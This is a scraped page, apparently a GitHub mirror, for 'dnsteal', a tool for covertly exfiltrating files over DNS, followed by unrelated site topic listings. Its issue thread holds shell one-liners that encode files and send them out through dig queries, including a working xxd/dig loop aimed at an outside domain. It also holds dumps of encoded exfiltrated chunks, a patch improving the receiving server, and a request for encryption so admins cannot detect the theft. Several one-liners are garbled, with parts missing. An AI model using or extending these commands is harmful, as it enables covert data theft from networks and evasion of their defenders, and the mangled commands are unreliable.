DNS Exfiltration tool for stealthily sending files over DNS requests.
License: GNU General Public License v2.0
I put together a small guide for Red Teaming called Red Team Codex, I should really update this more.
CHECK Team Leader
Hi,
I have the server running, as shown in the screen shot below and am able to send data from an Ubuntu client. Do you know what I need to modify in the command below to send data from a Windows client in PowerShell or cmd.exe?
f=test_file.txt; s=4;b=57;c=0; for r in echo -ne $r$f|tr "+" "*" +short; done
Thanks for your help
Hi,
nice project, but it missing a parenthesis at line 195.
Bye !
When testing from behind an Infoblox, I was seeing duplicate requests. The following patch helped drop the dups:
diff --git a/dnsteal.py b/dnsteal.py
index 692a9c9..f664577 100755
--- a/dnsteal.py
+++ b/dnsteal.py
@@ -53,7 +53,7 @@ def save_to_file(r_data, z, v):
for key,value in r_data.iteritems():
file_seed = time.strftime("%Y-%m-%d_%H-%M-%S")
- fname = "recieved_%s_%s" % (file_seed, key)
+ fname = "received_%s_%s" % (file_seed, key)
flatdata = ""
for block in value:
@@ -86,7 +86,7 @@ def save_to_file(r_data, z, v):
print "%s[Error]%s Could not unzip data, did you specify the -z switch ?" % (c["r"], c["e"])
exit(1)
- print "%s[Info]%s Saving recieved bytes to './%s'" % (c["y"], c["e"], fname)
+ print "%s[Info]%s Saving received bytes to './%s'" % (c["y"], c["e"], fname)
f.write(flatdata)
f.close()
else:
@@ -210,19 +210,30 @@ if __name__ == '__main__':
p_cmds(s,b,ip,z)
print "%s[+]%s Once files have sent, use Ctrl+C to exit and save.\n" % (c["g"], c["e"])
+ prev_buf = '';
try:
r_data = {}
while 1:
# There is a bottle neck in this function, if very slow PC, will take
- # slightly longer to send as this main loop recieves the data from victim.
+ # slightly longer to send as this main loop receives the data from victim.
data, addr = udp.recvfrom(1024)
+
+
+
p=DNSQuery(data)
+
udp.sendto(p.request(ip), addr)
req_split = p.data_text.split(".")
req_split.pop() # fix trailing dot... cba to fix this
+ if req_split == prev_buf:
+ skip = 1
+ else:
+ skip = 0
+ prev_buf = req_split
+
dlen = len(req_split)
fname = ""
tmp_data = []
@@ -244,7 +255,11 @@ if __name__ == '__main__':
print '%s[>>]%s %s -> %s:53' % (c["b"], c["e"], p.data_text, ip)
for d in tmp_data:
- r_data[fname].append(d)
+ if skip==0:
+ r_data[fname].append(d)
+ else:
+ if v:
+ print '=== duplicate block, skipping'
# print r_data
I use my Mac to hack the kali by VMware,i can't bind to my Kali's ip how should I do.My lord.
the terminals are as follows
chendadadeMacBook-Pro:dnsteal-master chendada$ python dnsteal.py 192.168.31.202 -z -v
___ _ _ ___ _ _
| \| \| / __| |_ ___ __ _| |
| |) | .` \__ \ _/ -_) _` | |
|___/|_|\_|___/\__\___\__,_|_|v2.0
-- https://github.com/m57/dnsteal.git --
Stealthy file extraction via DNS requests
[Error] Cannot bind to address 192.168.31.202:53
Hey, could you implement Crypto? This might avoid admins to discovery what you're trying to exfiltrate.
f=test.txt; s=4;b=57;c=0; for r in echo -ne $r$f|tr "+" "*" +short; done
dig: 'H4sICECX7lsAA3RvdG8udHh0AAvJyCxWAKJEhbTS5OzMvHSFktTiEoW0o-.vxchRD/EP*sIi4AxvE2RiMAAAA=-.test.txt' is not a legal IDN name (string start/ends with forbidden hyphen), use +noidnin
I had another idea... Now, I use dnsteal as a NameServer...
https://github.com/nemanjan00/dnsteal
bash for b in $(xxd -p /path/to/file); do dig +short $b.filename.ext.sacuvaj.ga ; done
From what I understand, any domain can be used, just subdomain is used for data transfer? What about implementing retrival of multiple files by using domainname as filename...
For example 5dfe8d9efd185b0f90a5fe6f17fcdc934d37a9e8fedff1cc73450057a2ad.image.png?
Do you know why I am seeing the error below when transferring a file from the client? Some of the file makes it to the server but not all of it.
I am able to transfer a file named hello.txt with a simple line of text inside it: "Hello"
I experience this issue when attempting to transfer other files that have a bit more text inside.
user01@recon02:~/dnsteal$ f=the_boy_who_lived.txt.gz; s=4;b=57;c=0; for r in echo -ne $r$f|tr "+" "*" +short; done
dig: 'H4sICOgjklgEAHRoZV9ib3lfd2hvX2xpdmVkLnR4dACNXcmS40QQvTvC/-.yD6Yohw9wfAgWBn2IM1OMpW2RYtS0bLGPP1vPcyq0pyNwQBM922pFpyz5-.dZmi/Lvr8VP3TjGPqibKtiPIXip67fhz70m6H4aezasF7xv0**/OiHnz/-.7sfju8/48ecvPys/v734rcvvy**efPrZ5/yy2/7J43ybT88FZ9O/dCE-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '27boDkU7nXeY4dBN/bb4oa/fhrH4lD2xRVTFZemzB5Vwzlbb0aTXIl-.dz8YugPYT82t6LtnPZbHGtbJLWzcVbwPWf572p6fi5/iANtGUw7heXU-.J3aQLv3FRFOuCYTjLLhR17Zr3oYKv2DJt/FUt8diGPuyPYai64vzbQB-.N6m4atuvVLuzLaQi2pjmYSyqumo3Y3Hqmqq41uOpGLAGrK8dAv5/MmI4-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'DbiscuDDeKzHEjA8aFIWh7o/F/uyabCML/qpbbGGARQ51RjrXFagfNXXT-.QNifhk4Bp7Z1cct1h8ON9zR2tynsqaG7dRtGH/vC3KZjx10xFXOGW1Xp-.3KtwEPi1pN2WOLZyi3J/CU2ZWXmjdio27pmurwF8xBUZpQ9ljnvFa743-.I0zCVTVGeu6kdsSXN7uvHvs6kss0J4h0m3DkUwwm7Gi4BDwydOMcHTxCO-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'scYDezCAnOje4psj9hXa4hDafQBdhstNl1rOzdXUx9Ou6wexPu5g4FKx1-.eEMumKK1gmM6xUuazO1Rqj79aq71G1tA/ZG4bYDW1pMvutE0SuuGD9fTB-.KwRhMcF9ayHUMF7kwuvWUzdHE5YdHccvp1ytOjt31oRwDZOkAsjrhS1L-.lHHZdheG6qanAvmEvYtSjibiLHkbBzM820V637jAObivqAxcOxaWYbsd-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '1lPuOluVK/sgvmNfqjpF4KwAadqakDeDnYimT8HLBkiPHD/YP8N0w4fr-.Fc1OFXux1SoC7YdoAUVeR8VBsTxzRDVK9TAEvsSxM6ykDXVYY7rHtjN-.Snadjhomk6Vj21PlU9nPi5HrkZqH43DPWuCabvSxnBWqaqwgCyOUbIqxu-.dIsmVcQArKmg6Zx4RdnTeEVJot0IYbyb47kN1yKaskjoFK5xQq6JZGx-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'AjIcf7UgMv461WeOXQ8UyvVKhgDkiOQpIEgYSUx5DuECKi0Xey1vHCbJ-.DuS1PXKNeJc/4UnZEmwsP2phig19XPQ2iX5v52wiNdsOyiE6aL62RRTU-.2zhWCDYD9PYajwExYf5Ol6rBsGpxH7UzZIkzdO6bboLsD898chzqSvw-.bpuMRmqIVYRyz0lpNNtOFhnKmgbJY0i6AnBfYGs3RNLIqxo09TVZ/oxbk-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '3Zym8xlMxcKwkku9fw6mPKT8ucP8kAoRtw4kNjjR9c/bl1Q5UvQueJiU1-.xLq5mbGD/vusZMmSAj24NwZIyZe1O3YaboTZBC8KOteHPiO2txJBskWr-.3nAGbKQdDy2oJe16Y4NJPUVKSWpytbqvuqjEot41B7tGGR38937hsl-.NSVpfh8OHDD8JfCC2wu/O3IcHiQ4CUY8IX16rofBza2p74WJOBnXAhV-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: '9qdk4vClWZBnMKGwJzp7BFJ313xtVbFuIQeR5ujJsg5PnxTjyM1/fYct-.g9YU9eTwvPdOVObcNCjcNyYn24VK4RIJbrvy95cXxm5fxewDBW1H2R9I-.1sTaJF18Nx8P5sE8wA4KMzjZfo98GCoT62uHm9osWX8JLSU1NjCYPVEU-.8ie1WRpNzeXkqPu96cyZwzAvurVeu2qRP/TcYb/PSnsiIYEjO3fK7P0KP-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'zZmcYXxYM2gDWbdeNV33XJTHsm5hcaKeiiO73U0rGsAcLunFrj2ug4jwp-.5u0OASWZnuAiHPnJ1jL37BEc1220LeQEqzU7LG0ojt8WLwZFavk61xND1-.mNhG402oLZuwYjYIdYqZkd/u4GBjaNYpb4/NT8dGweLzqYSicKiZotkm-.MR/3QOH1XggMnbm6EElRxcOzP7EXd913PqaJ4r1fOTN4q7rvDLtqEROT-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'VS18Ankh3o/piQ84xSDz1UR2VyQrhLDXHcOSEkdQjf5jCM2BBsMUZTiVz-.8Goc5kSXVzaffltJbrgkpFj7K4Ix/hDMmQB5igBjmY8/LUPlzHaJayoMs-.GwINaIhRdeaiuOEb9gKOQPn08jVGsQsURDppv6yPI55v6tfeLLSCeSZH-.Wq9AMIa5/MK7kgPUMbmoJfXk41Pvij/IsVkaq4vfmom3VeNX6aJMVYKL-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'sJiCG20CPdIDUUn0MYVlnisV/JsT8UPohV0MGVz0smpXkVwdmjVOAuj-.obn1qsD8oMbH8dCBtdmUnC6DMxvsMsraMdf26OP8Q7t2zBdEApxzSCVgg-.fSCd/jSQgeg5RDOZwQBdMcYkpzgrgZdgqb6pN9g6cNvah7hdVvID92W7g-.F3BvoX6mcDK2a6K0GbATBbtUN2XD8OdUjdarBssC2eeZ2xXhI91yYcFvF-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
dig: 'fKM7BlJ/QTQL8kLbl0fxg5wxRpWk5yWt4KyRQV0nDe9omg8w1W2rB5hHM-.UOKXO0aiK1STJdYuTeMUmpdDqcGfhWj0dYeOfoO8XPlpP0bzkxVe6dAu-.JsNrceKSLT/nmA00urnASpsC7cteYFDMMbvj7yMzq8dFI6Ww1UnW7twx-.7GopP0yCrxOIYlWQteHqCUoE3vs2rJwkxk0jif*7e0tVZzleCk1dq1ITc-.the_boy_who_lived.txt.gz' is not a legal name (ran out of space)
I tried. The first transfer must be unsuccessful, so I have to transfer twice, and the previous f = file must exist.
It's hard to imagine the hole I ran all morning
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.